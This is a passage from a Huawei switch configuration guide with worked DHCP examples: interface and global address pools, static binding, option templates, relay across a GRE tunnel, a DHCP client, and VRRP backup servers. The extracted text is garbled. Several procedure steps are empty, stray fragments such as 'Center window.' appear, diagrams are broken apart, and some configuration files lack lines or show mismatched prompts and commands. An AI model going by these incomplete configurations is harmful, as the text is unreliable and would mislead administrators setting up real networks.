trips. A PC (DHCP Client_1) requires fixed IP address 10.1.1.100/24 to meet service
requirements.

Figure 8-1 Networking diagram for configuring the device as a DHCP server
Internet
GE1/0/1 GE1/0/2
VLANIF10 VLANIF11
10.1.1.1/24 10.1.2.1/24
Switch
DHCP Server
LSW_1 LSW_2
DHCP Client_1
MAC:286e-d488-b684
... DHCP DHCP DHCP
... Client_t
Client_n Client_s
IP:10.1.1.100/24
Employees with Employees on
fixed office business trips
Configure the DHCP server function on the Switch to dynamically assign IP addresses to the
terminals on the two network segments. Configure the IP address lease to 30 days for the
employees with fixed office terminals on 10.1.1.0/24 and one day for the employees on
business trips on 10.1.2.0/24 to temporarily access the network.
NOTE
Configure the interface link types and VLANs on LSW_1 and LSW_2 to implement Layer 2 communication.
Procedure
Step 1 Enable the DHCP service. By default, the service is disabled.
[Switch] dhcp enable
Step 2 Add interfaces to VLANs.




Step 3 Configure IP addresses for VLANIF interfaces.

# Configure an IP address for VLANIF 10.
[Switch-Vlanif10] ip address 10.1.1.1 24 //Network segment assigned by the
enterprise for fixed office terminals

[Switch-Vlanif11] ip address 10.1.2.1 24 //Network segment assigned by the
enterprise for employees on business trips
Step 4 Configure an interface address pool.

# Configure the terminals connected to VLANIF 10 to obtain IP addresses from the interface
address pool.
[Switch-Vlanif10] dhcp select interface //Enable the DHCP server function based
on the interface address pool on the interface. By default, the function is
disabled.
[Switch-Vlanif10] dhcp server lease day 30 //The default lease is one day.
Modify the lease to 30 days.
[Switch-Vlanif10] dhcp server static-bind ip-address 10.1.1.100 mac-address 286e-
d488-b684 //Allocate a fixed IP address to Client_1.
# Configure the terminals connected to VLANIF 11 to obtain IP addresses from the interface
address pool. The default lease (one day) is used and does not need to be configured.
[Switch-Vlanif11] dhcp select interface //Enable the DHCP server function based
on the interface address pool on the interface. By default, the function is
disabled.
Step 5 Configure each terminal (using the PC running Windows 7 as an example) to automatically
obtain an IP address.
1. Right-click Network and choose Properties to display the Network and Sharing
Center window.
2. Click Local Area Connection to display the Local Area Connection Status window.
3. Click Properties to display the Local Area Connection Properties window.
4. Select Internet Protocol Version 4 (TCP/IPv4) and click Properties to display the
Internet Protocol Version 4 (TCP/IPv4) Properties window. Select Obtain an IP
address automatically, and click OK.
Run the display ip pool command on the Switch to check the configuration of VLANIF 10
and VLANIF 11. For example, the enterprise has 100 employees with fixed office terminals
and 3 employees on business trips.
[Switch] display ip pool interface vlanif10
Pool-name : Vlanif10
Pool-No : 0
Lease : 30 Days 0 Hours 0 Minutes
Domain-name : -

DNS-server0 : -
NBNS-server0 : -
Netbios-type : -
Position : Interface Status : Unlocked
Gateway-0 : 10.1.1.1
Network : 10.1.1.0
Mask : 255.255.255.0
VPN instance : --
-----------------------------------------------------------------------------
Start End Total Used Idle(Expired) Conflict Disable
-----------------------------------------------------------------------------
10.1.1.1 10.1.1.254 253 100 153(0) 0 0
-----------------------------------------------------------------------------
[Switch] display ip pool interface vlanif11
Pool-name : Vlanif11
Pool-No : 1
Domain-name : -
DNS-server0 : -
NBNS-server0 : -
Netbios-type : -
Position : Interface Status : Unlocked
Gateway-0 : 10.1.2.1
Network : 10.1.2.0
Mask : 255.255.255.0
VPN instance : --
-----------------------------------------------------------------------------
-----------------------------------------------------------------------------
10.1.2.1 10.1.2.254 253 3 250(0) 0 0
-----------------------------------------------------------------------------
----End
Configuration Files
#
sysname Switch
#
vlan batch 10 to 11
#
dhcp enable
#
interface Vlanif10
ip address 10.1.1.1 255.255.255.0
dhcp server static-bind ip-address 10.1.1.100 mac-address 286e-d488-b684
dhcp server lease day 30 hour 0 minute 0
#
interface Vlanif11
ip address 10.1.2.1 255.255.255.0
#
#
#
return

Video
Configure DHCP Server and Relay
8.1.2 Example for Configuring a Device as the DHCP Server

(Based on the Global Address Pool)
terminals.
Network).
Configuration Notes
NOTE
As shown in Figure 8-2, an enterprise has two offices, to save network resources, the switch
functions as the DHCP server to allocate IP addresses to hosts in the two offices. Hosts in
office 1 are on the network segment 10.1.1.0/25 and are added to VLAN 10, the lease of IP
addresses for these hosts is ten days; hosts in office 2 are on the network segment
10.1.1.128/25 and are added to VLAN 11, the lease of IP addresses for these hosts is two
days.

Figure 8-2 Networking diagram for configuring a device as the DHCP server
D N S S e rve r
1 0 .1 .2 .3 /2 5
IP N e tw o rk
G E 1 /0 /1 G E 1 /0 /2
V L A N IF 1 0 V L A N IF 1 1
1 0 .1 .1 .1 /2 5 1 0 .1 .1 .1 2 9 /2 5
S w itch
D H C P S e rve r
DHCP ... D H C P DHCP .. . DHCP

C lie n t_ 1 C lie n t_ n C lie n t_ s C lie n t_ t
Configure the switch as the DHCP server to dynamically allocate IP addresses and the DNS
server address to hosts in the two offices. PCs on the network segment 10.1.1.0/25 are for
employees in office 1 and obtain IP addresses with a lease of ten days. PCs on the network
segment 10.1.1.128/25 are for employees in office 2 and obtain IP addresses with a lease of
two days.
Procedure
Step 1 Enable the DHCP service.
[Switch] dhcp enable
Step 2 Add interfaces to a VLAN.

[Switch-GigabitEthernet1/0/1] port hybrid pvid vlan 10
[Switch-GigabitEthernet1/0/1] port hybrid untagged vlan 10

Step 3 Configure IP addresses for VLANIF interfaces.




Step 4 Configure global address pools.

# Configure the IP addresses and relevant network parameters of the global address pool
pool1.
[Switch] ip pool pool1
[Switch-ip-pool-pool1] network 10.1.1.0 mask 255.255.255.128
[Switch-ip-pool-pool1] dns-list 10.1.2.3
[Switch-ip-pool-pool1] gateway-list 10.1.1.1
[Switch-ip-pool-pool1] lease day 10
[Switch-ip-pool-pool1] quit
# Configure the IP addresses and relevant network parameters of the global address pool
pool2.
[Switch] ip pool pool2
[Switch-ip-pool-pool1] network 10.1.1.128 mask 255.255.255.128
[Switch-ip-pool-pool1] dns-list 10.1.2.3
[Switch-ip-pool-pool1] gateway-list 10.1.1.129
[Switch-ip-pool-pool1] lease day 2
[Switch-ip-pool-pool1] quit
Step 5 Enable the DHCP server.

# Enable the DHCP server on VLANIF 10.
[Switch-Vlanif10] dhcp select global
# Enable the DHCP server on VLANIF 11.

[Switch-Vlanif11] dhcp select global

# Run the display ip pool name pool1 command on the switch to view IP address allocation
in the global address pool pool1. The Used field displays the number of allocated IP
addresses.
[Switch] display ip pool name pool1
Pool-name : pool1
Pool-No : 0
Domain-name : -
DNS-server0 : 10.1.2.3
NBNS-server0 : -
Netbios-type : -
Gateway-0 : 10.1.1.1
Network : 10.1.1.0
Mask : 255.255.255.128
VPN instance : --
-----------------------------------------------------------------------------

-----------------------------------------------------------------------------
10.1.1.1 10.1.1.126 125 2 123(0) 0 0
-----------------------------------------------------------------------------
# Run the display ip pool name pool2 command on the switch to view IP address allocation
in the global address pool pool2. The Used field displays the number of allocated IP
addresses.
[Switch] display ip pool interface pool2
Pool-name : pool2
Pool-No : 1
Domain-name : -
NBNS-server0 : -
Netbios-type : -
Gateway-0 : 10.1.1.129
Network : 10.1.1.128
Mask : 255.255.255.128
VPN instance : --
-----------------------------------------------------------------------------
-----------------------------------------------------------------------------
10.1.1.129 10.1.1.254 125 2 123(0) 0 0
-----------------------------------------------------------------------------
----End
Configuration Files
Switch configuration file
#
sysname Switch
#
vlan batch 10 to 11
#
dhcp enable
#
ip pool pool1
gateway-list 10.1.1.1
network 10.1.1.0 mask 255.255.255.128
lease day 10 hour 0 minute 0
dns-list 10.1.2.3
#
ip pool pool2
network 10.1.1.128 mask 255.255.255.128
dns-list 10.1.2.3
#
interface Vlanif10
ip address 10.1.1.1 255.255.255.128
dhcp select global
#
interface Vlanif11
ip address 10.1.1.129 255.255.255.128
dhcp select global
#
#

#
return
Video
8.1.3 Example for Configuring a DHCP Server to Allocate

Different Network Parameters from the Global Address Pool to
Dynamic and Static Clients

terminals.
Network).
Configuration Notes
NOTE
As shown in Figure 8-3, the IP phone and PCs are devices in an office area. To uniformly
manage devices and reduce manual configuration costs, the administrator needs to configure

hosts to dynamically obtain IP addresses through DHCP. PCs are fixed terminals in the duty
room. They need to always be online and use domain names to access network devices. In
addition to obtaining an IP address dynamically, the PCs require an unlimited IP address lease
and need to obtain information about the DNS server. The IP phone uses a fixed IP address
10.1.1.4/24 and its MAC address is dcd2-fc96-e4c0. In addition to obtaining an IP address,
the IP phone needs to dynamically obtain the startup configuration file. The startup
configuration file configuration.ini is stored on the FTP server. The routes between the FTP
server and IP phone must be reachable. The gateway address of the PCs and IP phone is
10.1.1.1/24.
DNS Server
10.1.1.2/24
GE1/0/1
SwitchB VLANIF10
10.1.1.1/24 Internet
SwitchA
IP Phone DHCP Server
10.1.1.4/24
PC PC PC FTP Server
10.1.1.3/24
1. Create a DHCP Option template on SwitchA. In the DHCP Option template view,
configure the startup configuration file for the static client IP phone, and specify the IP
address of the FTP server for the IP phone.
2. Create a global address pool on SwitchA. In the global address pool view, configure the
IP address lease and information about the DNS server for the dynamic client PCs. Bind
an IP address and the DHCP Option template to the MAC address of the static client IP
phone. In this way, the DHCP server can allocate different network parameters to
dynamic and static clients.
Procedure
Step 1 Create a VLAN and configure an IP address for the VLANIF interface.
[SwitchA] vlan 10
[SwitchA-GigabitEthernet1/0/1] port hybrid pvid vlan 10
[SwitchA-GigabitEthernet1/0/1] port hybrid untagged vlan 10

[SwitchA-Vlanif10] ip address 10.1.1.1 255.255.255.0

Step 2 Enable the DHCP service.

[SwitchA] dhcp enable
Step 3 Create a DHCP Option template. In the DHCP Option template view, configure the startup
configuration file for the static client IP phone, and specify the IP address of the file server for
the IP phone.
[SwitchA] dhcp option template template1
[SwitchA-dhcp-option-template-template1] gateway-list 10.1.1.1
[SwitchA-dhcp-option-template-template1] bootfile configuration.ini
[SwitchA-dhcp-option-template-template1] next-server 10.1.1.3
[SwitchA-dhcp-option-template-template1] quit
Step 4 Create an IP address pool. In the IP address pool view, configure the gateway address, IP
address lease, and IP address of the DNS server for the PCs. Allocate a fixed IP address to the
IP phone and configure the startup configuration file.
[SwitchA] ip pool pool1
[SwitchA-ip-pool-pool1] network 10.1.1.0 mask 255.255.255.0
[SwitchA-ip-pool-pool1] dns-list 10.1.1.2
[SwitchA-ip-pool-pool1] gateway-list 10.1.1.1
[SwitchA-ip-pool-pool1] excluded-ip-address 10.1.1.2 10.1.1.3
[SwitchA-ip-pool-pool1] lease unlimited
[SwitchA-ip-pool-pool1] static-bind ip-address 10.1.1.4 mac-address dcd2-fc96-
e4c0 option-template template1
[SwitchA-ip-pool-pool1] quit
Step 5 Enable the DHCP server function on the VLANIF 10 interface.

[SwitchA-Vlanif10] dhcp select global

# Run the display ip pool name pool1 command on SwitchA to view the address pool
configuration.
[SwitchA] display ip pool name pool1
Pool-name : pool1
Pool-No : 0
Lease : unlimited
Domain-name : -
NBNS-server0 : -
Netbios-type : -
Gateway-0 : 10.1.1.1
Network : 10.1.1.0
Mask : 255.255.255.0
VPN instance : --
-----------------------------------------------------------------------------
-----------------------------------------------------------------------------
10.1.1.1 10.1.1.254 253 4 247(0) 0 2
-----------------------------------------------------------------------------
# Run the display dhcp option template name template1 command on SwitchA to view the
DHCP Option template configuration.
[SwitchA] display dhcp option template name template1
-----------------------------------------------------------------------------
Template-Name : template1
Template-No : 0
Next-server : 10.1.1.3

Domain-name : -
DNS-server0 : -
NBNS-server0 : -
Netbios-type : -
Gateway-0 : 10.1.1.1
Bootfile : configuration.ini
----End
Configuration Files
#
sysname SwitchA
#
vlan batch 10
#
dhcp enable
#
dhcp option template template1
next-server 10.1.1.3
bootfile configuration.ini
#
ip pool pool1
network 10.1.1.0 mask 255.255.255.0
excluded-ip-address 10.1.1.2 10.1.1.3
static-bind ip-address 10.1.1.4 mac-address dcd2-fc96-e4c0 option-template
template1
lease unlimited
dns-list 10.1.1.2
#
interface Vlanif10
ip address 10.1.1.1 255.255.255.0
dhcp select global
#
#
return
Video
8.1.4 Example for Configuring the Device as a DHCP Relay (on

the Same Network)
DHCP Relay Overview
A DHCP relay forwards DHCP packets between the DHCP server and clients. When the
DHCP server and clients belong to different network segment, the DHCP relay needs to be
configured. For DHCP clients, the DHCP relay is the DHCP server; for the DHCP server, the
DHCP relay is a DHCP client.
The DHCP relay function applies to large networks with many sparsely-distributed user
gateways. To reduce the maintenance workload, the network administrator does not want to

configure the DHCP server function on each aggregation switch (user gateway) and requires
that the DHCP server function be configured on a core device or an exclusive DHCP server
be deployed in the server area. In this case, the aggregation switches functioning as the user
gateways need to be configured with the DHCP relay function to implement exchange of
DHCP packets between the DHCP server and clients.
Configuration Notes
NOTE
As shown in Figure 8-4, an enterprise deploys the DHCP server on the core switch. The
DHCP server and terminals in the enterprise belong to different network segments. The
enterprise requires that the DHCP server should dynamically assign IP addresses to the
terminals.
Figure 8-4 Networking diagram for configuring the device as a DHCP relay
Internet
SwitchB
DHCP Server
GE1/0/1
VLANIF200
GE1/0/1 192.168.20.2/24
VLANIF200
192.168.20.1/24
SwitchA
DHCP Relay
GE1/0/2
VLANIF100
10.10.20.1/24
LSW
DHCP Client DHCP Client

1. Configure the DHCP relay on SwitchA (user gateway) to forward DHCP packets
between the terminals and DHCP server.
2. On SwitchB, configure the DHCP server based on the global address pool so that the
DHCP server can assign IP addresses from the global address pool to the terminals.
NOTE
Use a Huawei S series switch as an example for the DHCP server (SwitchB).
On the LSW, configure the interface link type and VLAN to implement Layer 2 communication.
Procedure
Step 1 Configure the DHCP relay on SwitchA.
# Add the interface to the VLAN.
# Enable the DHCP relay function on the interface.

[SwitchA] dhcp enable //Enable the DHCP service. By default, the service is
disabled.
[SwitchA-Vlanif100] dhcp select relay //Enable the DHCP relay function. By
default, the function is disabled.
[SwitchA-Vlanif100] dhcp relay server-ip 192.168.20.2 //Configure the DHCP
server IP address for the DHCP relay agent.
Step 2 Configure the DHCP server function based on the global address pool on SwitchB.
# Enable the DHCP service. By default, the service is disabled.
[SwitchB] dhcp enable
# Configure VLANIF 200 to work in global address pool mode.

[SwitchB] vlan 200
[SwitchB-Vlanif200] dhcp select global //Enable the DHCP server function based

on the global address pool on the interface. By default, the function is disabled.
# Create an address pool and configure the attributes. The default lease (one day) is used and
does not need to be configured.
[SwitchB] ip pool pool1
[SwitchB-ip-pool-pool1] network 10.10.20.0 mask 24 //Configure the network
segment and mask of the global address pool.
[SwitchB-ip-pool-pool1] gateway-list 10.10.20.1 //Configure the gateway address
assigned to the terminals.
[SwitchB-ip-pool-pool1] quit
Step 3 Configure static routes to the terminals on SwitchB.

Center window.
# Run the display dhcp relay interface vlanif 100 command on SwitchA to check the DHCP
relay configuration.
[SwitchA] display dhcp relay interface vlanif 100
DHCP relay agent running information of interface Vlanif100 :
Server IP address [00] : 192.168.20.2
Gateway address in use : 10.10.20.1
# Run the display ip pool command on SwitchB to check the IP address allocation of pool1.
For example, the enterprise has 100 terminals.
[SwitchB] display ip pool name pool1
Pool-name : pool1
Pool-No : 0
Domain-name : -
DNS-server0 : -
NBNS-server0 : -
Netbios-type : -
Gateway-0 : 10.10.20.1
Network : 10.10.20.0
Mask : 255.255.255.0
VPN instance : --
--------------------------------------------------------------------------
--------------------------------------------------------------------------
10.10.20.1 10.10.20.254 253 100 153(0) 0 0
--------------------------------------------------------------------------
----End

Configuration Files
#
sysname SwitchA
#
vlan batch 100 200
#
dhcp enable
#
interface Vlanif100
ip address 10.10.20.1 255.255.255.0
dhcp select relay
#
interface Vlanif200
ip address 192.168.20.1 255.255.255.0
#
#
port link-type
access
#
return

#
sysname SwitchB
#
vlan batch 200
#
dhcp enable
#
ip pool pool1
network 10.10.20.0 mask 255.255.255.0
#
interface Vlanif200
ip address 192.168.20.2 255.255.255.0
dhcp select global
#
#
ip route-static 10.10.20.0 255.255.255.0
192.168.20.1
#
return
Video

8.1.5 Example for Configuring the Device as a DHCP Relay

(Across a GRE Tunnel)
DHCP Relay Overview
A DHCP relay forwards DHCP packets between the DHCP server and clients. When the
DHCP server and clients belong to different network segment, the DHCP relay needs to be
configured. For DHCP clients, the DHCP relay is the DHCP server; for the DHCP server, the
DHCP relay is a DHCP client.
The DHCP relay function applies to large networks with many sparsely-distributed user
gateways. To reduce the maintenance workload, the network administrator does not want to
configure the DHCP server function on each aggregation switch (user gateway) and requires
that the DHCP server function be configured on a core device or an exclusive DHCP server
be deployed in the server area. In this case, the aggregation switches functioning as the user
gateways need to be configured with the DHCP relay function to implement exchange of
DHCP packets between the DHCP server and clients.
The DHCP relay and DHCP server can be deployed across a VPN (such as GRE or MPLS
L3VPN) network. A GRE tunnel is used as an example to describe how to configure a DHCP
relay.
Configuration Notes
NOTE
As shown in Figure 8-5, an enterprise deploys its headquarters and branch in different areas.
A GRE tunnel is deployed between the headquarters and branch to enable them to
communicate through the Internet. To facilitate unified management, the enterprise
administrator deploys the DHCP server on Switch_1 in the headquarters to assign IP
addresses to the terminals in the headquarters and branch. The network segments 10.1.1.0/24
and 10.2.1.0/24 are planned for the headquarters and branch respectively.

Figure 8-5 Networking diagram for configuring the device as a DHCP relay
G E 1 /0 /0
S w itch _ 2
G E 2 /0 /0
1 9 2 .1 6 8 .2 0 .2 /2 4 1 9 2 .1 6 8 .3 0 .1 /2 4
G E 1 /0 /0 G E 1 /0 /0
1 9 2 .1 6 8 .2 0 .1 /2 4 Tunnel Tunnel 1 9 2 .1 6 8 .3 0 .2 /2 4
S w itc h _ 1 1 9 2 .1 6 8 .4 0 .1 /2 4 1 9 2 .1 6 8 .4 0 .2 /2 4 S w itch _ 3
D H C P S e rve r G RE Tunnel D H C P R e la y
G E 2 /0 /0 G E 2 /0 /0
V L A N IF 3 0 1 0 .1 .1 .1 /2 4 V L A N IF 3 0 1 0 .2 .1 .1 /2 4
LSW _1 LSW _2
D H C P clie n ts D H C P clie n ts
H e a d q u a rte rs B ra n c h
1. Run OSPF between Switch_1, Switch_2, and Switch_3 to ensure the communication
between devices.
2. On Switch_1 and Switch_3, configure tunnel interfaces and create a GRE tunnel.
3. On Switch_1, configure the DHCP server based on the global address pool so that the
DHCP server can assign IP addresses from the global address pool to the terminals in the
headquarters and branch.
4. On Switch_3, configure the DHCP relay function to function as the branch's gateway to
forward DHCP packets between the terminals and DHCP servers so that the terminals
can apply to the DHCP server for IP addresses.
NOTE
Use a Huawei S series switch as an example for the DHCP server (Switch_1).
Configure the interface link types and VLANs on LSW_1 and LSW_2 to implement Layer 2 communication.
Procedure
Step 1 Configure an IP address for each physical interface on Switch_1 through Switch_3.
[Switch_1] interface gigabitethernet 1/0/0

[Switch_1] interface vlanif 10

[Switch_1-Vlanif10] ip address 192.168.20.1 24
[Switch_1-Vlanif10] quit
Step 2 Run OSPF between Switch_1, Switch_2, and Switch_3.

[Switch_1] ospf 1
[Switch_1-ospf-1] area 0
[Switch_1-ospf-1-area-0.0.0.0] network 192.168.20.0 0.0.0.255
[Switch_1-ospf-1-area-0.0.0.0] quit
[Switch_1-ospf-1] quit
[Switch_2] ospf 1
[Switch_3] ospf 1


Step 3 Configure tunnel interfaces.

[Switch_1] interface tunnel 1
[Switch_1-Tunnel1] tunnel-protocol gre
[Switch_1-Tunnel1] ip address 192.168.40.1 24
[Switch_1-Tunnel1] source 192.168.20.1
[Switch_1-Tunnel1] destination 192.168.30.2
[Switch_1-Tunnel1] quit
[Switch_3] interface tunnel 1
[Switch_3-Tunnel1] tunnel-protocol gre
[Switch_3-Tunnel1] ip address 192.168.40.2 24
[Switch_3-Tunnel1] source 192.168.30.2
[Switch_3-Tunnel1] destination 192.168.20.1
[Switch_3-Tunnel1] quit
Step 4 Configure the DHCP server function on Switch_1.

[Switch_1] dhcp enable
# Create a global address pool and configure related parameters.

[Switch_1] ip pool pool1
[Switch_1-ip-pool-pool1] network 10.2.1.0 mask 255.255.255.0 //Network segment
for terminals in the branch
[Switch_1-ip-pool-pool1] gateway-list 10.2.1.1 //Gateway address for terminals
in the branch
[Switch_1-ip-pool-pool1] quit
[Switch_1-ip-pool-pool2] network 10.1.1.0 mask 255.255.255.0 //Network segment
for terminals in the headquarters
[Switch_1-ip-pool-pool2] gateway-list 10.1.1.1 //Gateway address for terminals
in the headquarters
# Configure the terminals connected to VLANIF30 to obtain IP addresses from the global
address pool.
[Switch_1-Vlanif30] dhcp select global //Enable the DHCP server function based
on the global address pool on the interface. By default, the function is disabled.
# Configure a static route to the network segment of the terminals in the branch.
[Switch_1] ip route-static 10.2.1.0 255.255.255.0 tunnel 1
Step 5 # Configure the DHCP relay function on Switch_3.

# Configure the DHCP relay function on VLANIF 30 and specifies the DHCP server address
for the relay.
[Switch_3-Vlanif30] dhcp select relay //Enable the DHCP relay function. By
default, the function is disabled.
[Switch_3-Vlanif30] dhcp relay server-ip 10.1.1.1 //Configure the DHCP server IP
address for the DHCP relay agent.

# Configure a static route to the network segment of the server.

[Switch_3] ip route-static 10.1.1.0 255.255.255.0 tunnel 1
Center window.
# Run the display dhcp relay interface vlanif 30 command on Switch_3 to check the DHCP
relay configuration.
[Switch_3] display dhcp relay interface vlanif
30
DHCP relay agent running information of interface Vlanif30 :

Server IP address [00] : 10.1.1.1
Gateway address in use : 10.2.1.1
# Run the display ip pool command on Switch_1 to check the IP address allocation of pool1
and pool2. For example, the headquarters has 100 terminals and the branch has 50 terminals.
[Switch_1] display ip pool name pool1
Pool-name :
pool1
Pool-No :
0
Lease : 1 Days 0 Hours 0

Minutes
Domain-name :
-
DNS-server0 :
-
NBNS-server0 :
-
Netbios-type :
-
Position : Local Status :

Unlocked
Gateway-0 :
10.2.1.1
Network :
10.2.1.0
Mask :
255.255.255.0
VPN instance :
--

-----------------------------------------------------------------------------
Start End Total Used Idle(Expired) Conflict

Disable
-----------------------------------------------------------------------------
10.2.1.1 10.2.1.254 253 50 203(0) 0

0
-----------------------------------------------------------------------------
Pool-name :
pool2
Pool-No :
1

Minutes
Domain-name :
-
DNS-server0 :
-
NBNS-server0 :
-
Netbios-type :
-

Unlocked
Gateway-0 :
10.1.1.1
Network :
10.1.1.0
Mask :
255.255.255.0
VPN instance :
--
-----------------------------------------------------------------------------

Disable
-----------------------------------------------------------------------------
10.1.1.1 10.1.1.254 253 100 153(0) 0

0
-----------------------------------------------------------------------------
----End
Configuration Files
l Configuration file of Switch_1
#
sysname Switch_1
#

vlan batch 10 30
#
dhcp
enable
#
ip pool
pool1
gateway-list
10.2.1.1

255.255.255.0
#
ip pool
pool2
gateway-list
10.1.1.1

255.255.255.0
#
interface Vlanif10
ip address 192.168.20.1 255.255.255.0
#
interface Vlanif30
ip address 10.1.1.1 255.255.255.0
dhcp select global
#
#
#
interface Tunnel1
ip address 192.168.40.1 255.255.255.0
tunnel-protocol gre
source 192.168.20.1
#
ospf 1
area 0.0.0.0
network 192.168.20.0 0.0.0.255
#
ip route-static 10.2.1.0 255.255.255.0 Tunnel1
#
return
#
sysname Switch_2
#
vlan batch 10 20
#
interface Vlanif10
ip address 192.168.20.2 255.255.255.0
#
interface Vlanif20
ip address 192.168.30.1 255.255.255.0
#

#
#
ospf 1
area 0.0.0.0
network 192.168.20.0 0.0.0.255
network 192.168.30.0 0.0.0.255
#
return

#
sysname Switch_3
#
vlan batch 20 30
#
dhcp
enable
#
interface Vlanif20
ip address 192.168.30.2 255.255.255.0
#
interface Vlanif30
ip address 10.2.1.1 255.255.255.0
dhcp select
relay

#
#
#
interface Tunnel1
ip address 192.168.40.2 255.255.255.0
tunnel-protocol gre
source 192.168.30.2
#
ospf 1
area 0.0.0.0
network 192.168.30.0 0.0.0.255
#
ip route-static 10.1.1.0 255.255.255.0 Tunnel1
#
return
Video

8.1.6 Example for Configuring a DHCP Client
DHCP Client Overview

A device can function as a DHCP client and dynamically obtain network parameters including
the IP address from a DHCP server. This mechanism lowers manual costs, reduces errors, and
facilitates unified management.
Configuration Notes
NOTE
As shown in Figure 8-6, Switch_1 functions as the DHCP client to dynamically obtain
information including the IP address, DNS server address, and gateway address from the
DHCP server (Switch_2).
Gateway
192.168.1.126/24
DNS Server Switch_2
192.168.1.2/24 DHCP Server
GE1/0/1
VLANIF10
192.168.1.1/24
GE1/0/1
VLANIF10
Switch_1
DHCP Client
1. Configure Switch_1 as the DHCP client to dynamically obtain the IP address from a
DHCP server.
2. Configure Switch_2 as the DHCP server to dynamically allocate network parameters
including IP addresses to Switch_1.

Procedure
Step 1 Configure Switch_1 as the DHCP client.
# Create VLAN 10, and add GE1/0/1 to VLAN 10.
[Switch_1] vlan 10
[Switch_1-vlan10] quit
# Enable the DHCP client function on VLANIF 10.

[Switch_1-Vlanif10] ip address dhcp-alloc
Step 2 Create a global address pool on Switch_2 and set corresponding attributes.
1. Enable the DHCP service.
2. Create VLAN 10, and add GE1/0/1 to VLAN 10.

[Switch_2] vlan 10
[Switch_2-vlan10] quit
3. Configure VLANIF 10 to work in global address pool mode.

[Switch_2-Vlanif10] dhcp select global
4. Create an address pool and set corresponding attributes.

[Switch_2-ip-pool-pool1] network 192.168.1.0 mask 24
[Switch_2-ip-pool-pool1] gateway-list 192.168.1.126
[Switch_2-ip-pool-pool1] dns-list 192.168.1.2
[Switch_2-ip-pool-pool1] excluded-ip-address 192.168.1.2

# Run the display this command on VLANIF 10 of Switch_1 to view the DHCP client
configuration.
[Switch_1-Vlanif10] display this
#
interface Vlanif10
ip address dhcp-alloc
#
return
# After VLANIF 10 obtains an IP address, run the display dhcp client command on Switch_1
to view the status of the DHCP client on VLANIF 10.
[Switch_1] display dhcp client
DHCP client lease information on interface
Vlanif10 :

Current machine state :

Bound
Internet address assigned via :

DHCP
Physical address : 0025-9efb-

be55
IP address :
192.168.1.254
Subnet mask :
255.255.255.0
Gateway ip address :
192.168.1.126
DHCP server :
192.168.1.1
Lease obtained at : 2014-09-10

20:30:39
Lease expires at : 2014-09-11

20:30:39
Lease renews at : 2014-09-11

08:30:39
Lease rebinds at : 2014-09-11

17:30:39
DNS : 192.168.1.2
# On Switch_2, run the display ip pool name pool1 command to view IP address allocation
in the address pool. The Used field displays the number of used IP addresses in the address
pool.
Pool-name :
pool1
Pool-No :
0

Minutes
Domain-name :
-
DNS-server0 :
192.168.1.2
NBNS-server0 :
-
Netbios-type :
-

Unlocked
Gateway-0 :
192.168.1.126
Network :
192.168.1.0

Mask :
255.255.255.0
VPN instance :
--
-----------------------------------------------------------------------------

Disable
-----------------------------------------------------------------------------
192.168.1.1 192.168.1.254 253 1 251(0) 0

1
-----------------------------------------------------------------------------
----End
Configuration Files
#
sysname Switch_1
#
vlan batch 10
#
interface
Vlanif10
ip address dhcp-
alloc
#
interface
GigabitEthernet1/0/1
port link-type
trunk
port trunk allow-pass vlan
10
#
return

#
sysname Switch_2
#
vlan batch 10
#
dhcp enable
#
ip pool pool1
network 192.168.1.0 mask 255.255.255.0
excluded-ip-address 192.168.1.2
dns-list 192.168.1.2
#
interface Vlanif10
ip address 192.168.1.1 255.255.255.0
dhcp select global
#
interface

port link-type
trunk
10
#
return
Video
8.1.7 Example for Configuring DHCP Servers Based on the Global

Address Pool on the Same Network Segment in VRRP
Networking

terminals.
Network).
Configuration Notes
NOTE

As shown in Figure 8-7, a host in an enterprise is dual-homed to SwitchA and SwitchB
through Switch. SwitchA functions as the master DHCP server to allocate IP addresses to the
host. If the master DHCP server fails, a backup DHCP server must allocate an IP address to
the host.
VRRP VRID 1 SwitchA
Virtual IP Address: GE1/0/2 Master DHCP Server
10.1.1.111 VLANIF100
10.1.1.1/24
GE1/0/5
GE1/0/1
GE1/0/3
Switch
DHCP GE1/0/2
Client GE1/0/5
GE1/0/2
VLANIF100
10.1.1.129/24 SwitchB
Backup DHCP Server
1. Configure IP addresses for interfaces connecting SwitchA and SwitchB to implement
network-layer connectivity. Configure Switch to transparently transmit Layer 2 packets.
2. Configure a VRRP group on SwitchA and SwitchB. SwitchA has a higher priority and
functions as the DHCP server to allocate IP addresses to clients. SwitchB has a lower
priority and functions as a backup DHCP server.
3. Create global address pools on SwitchA and SwitchB, and set corresponding attributes.
4. Configure a loop prevention protocol on Switch, SwitchA, and SwitchB to prevent loops.
In this example, STP is configured.
Procedure
Step 1 Configure network-layer connectivity among devices.
# Configure IP addresses for interfaces connecting SwitchA and SwitchB. SwitchA is used as
an example. The configuration on SwitchB is similar to that on SwitchA. For details, see the
configuration file of SwitchB.


# Configure Layer 2 transparent transmission on Switch.

[Switch] vlan 100
Step 2 Create address pools and set corresponding attributes.
# Enable DHCP on SwitchA.

[SwitchA] dhcp enable
# Create an address pool on SwitchA and specify an IP address range 10.1.1.2 to 10.1.1.128,
which is exclusive from the IP address range of the address pool on SwitchB.
NOTE
Information about the address pool on the master DHCP server cannot be backed up to a backup DHCP
server in real time. To prevent IP address conflicts after a master/backup switchover, ensure that the
address pool ranges on the master and backup DHCP servers are exclusive to one another.
[SwitchA] ip pool 1
[SwitchA-ip-pool-1] network 10.1.1.0 mask 255.255.255.0
[SwitchA-ip-pool-1] gateway-list 10.1.1.111
[SwitchA-ip-pool-1] excluded-ip-address 10.1.1.1
[SwitchA-ip-pool-1] excluded-ip-address 10.1.1.129 10.1.1.254
[SwitchA-ip-pool-1] lease day 10
[SwitchA-ip-pool-1] quit
# Create an address pool on SwitchB and specify an IP address range 10.1.1.130 to

10.1.1.254, which is exclusive from the IP address range of the address pool on SwitchA.
[SwitchB] dhcp enable
[SwitchB] ip pool 1
[SwitchB-ip-pool-1] network 10.1.1.0 mask 255.255.255.0
[SwitchB-ip-pool-1] gateway-list 10.1.1.111
[SwitchB-ip-pool-1] excluded-ip-address 10.1.1.1 10.1.1.110
[SwitchB-ip-pool-1] excluded-ip-address 10.1.1.112 10.1.1.129
[SwitchB-ip-pool-1] lease day 10
[SwitchB-ip-pool-1] quit
Step 3 Configure a VRRP group.

# Create VRRP group 1 on SwitchA, set the priority of SwitchA in the VRRP group to 120,
and configure clients to obtain IP addresses from a global address pool.
[SwitchA-Vlanif100] dhcp select global
